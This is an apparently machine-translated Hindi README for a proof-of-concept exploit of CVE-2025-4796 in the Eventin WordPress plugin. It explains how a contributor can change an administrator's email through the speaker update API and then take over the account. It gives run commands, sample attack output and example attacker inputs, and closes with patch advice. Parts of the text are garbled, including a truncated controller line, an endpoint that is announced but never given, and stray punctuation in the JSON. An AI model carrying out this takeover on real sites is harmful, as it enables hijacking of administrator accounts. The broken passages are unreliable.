
eventin <= 4.0.34 - प्रमाणित योगदानकर्ता+ के लिए उपयोगकर्ता ईमेल परिवर्तन / खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि
eventin <= 4.0.34 - प्रमाणित योगदानकर्ता+ के लिए उपयोगकर्ता ईमेल परिवर्तन/खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि
eventin वर्डप्रेस प्लगइन (<= 4.0.34) में एक विशेषाधिकार वृद्धि बग है जो किसी भी योगदानकर्ता या उच्च उपयोगकर्ता को प्लगइन के स्पीकर अपडेट एपीआई के माध्यम से किसी भी उपयोगकर्ता का ईमेल बदलने देता है। एक व्यवस्थापक ईमेल को हमलावर के नियंत्रण वाले ईमेल में बदलकर, वे पासवर्ड रीसेट कर सकते हैं और खाते पर कब्जा कर सकते हैं।
eventin\speaker\api\speakercontroller::update_item)eventin यह ठीक से जाँच नहीं करता कि अपडेट का अनुरोध कौन कर रहा है या क्या उन्हें उपयोगकर्ता ईमेल बदलने की अनुमति है। एक योगदानकर्ता या उच्च इस एंडपॉइंट को कॉल कर सकता है:
आवश्यकताएँ:
requests स्थापित करें:
pip install requests
स्क्रिप्ट चलाएँ और संकेत मिलने पर आवश्यक मान दर्ज करें:
python3 CVE-2025-4796.py
[+] ssl सत्यापन चेतावनियाँ बंद की जा रही हैं
[+] वर्डप्रेस में लॉगिन कर रहे हैं.
[+] लॉगिन सफल.
[+] nonce टोकन लाया जा रहा है
[+] nonce टोकन मिला: abcdef1234567890
[+] स्पीकर ईमेल के लिए अपडेट अनुरोध
[+] अपडेट ऑपरेशन सफल.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
पैच eventin प्लगइन के संस्करण 4.0.35 में जारी किया गया है। साइट प्रशासकों को दृढ़ता से सलाह दी जाती है कि वे तुरंत इस संस्करण में अपडेट करें। फिक्स में SpeakerController::update_item फ़ंक्शन में अतिरिक्त उपयोगकर्ता सत्यापन जाँच शामिल हैं।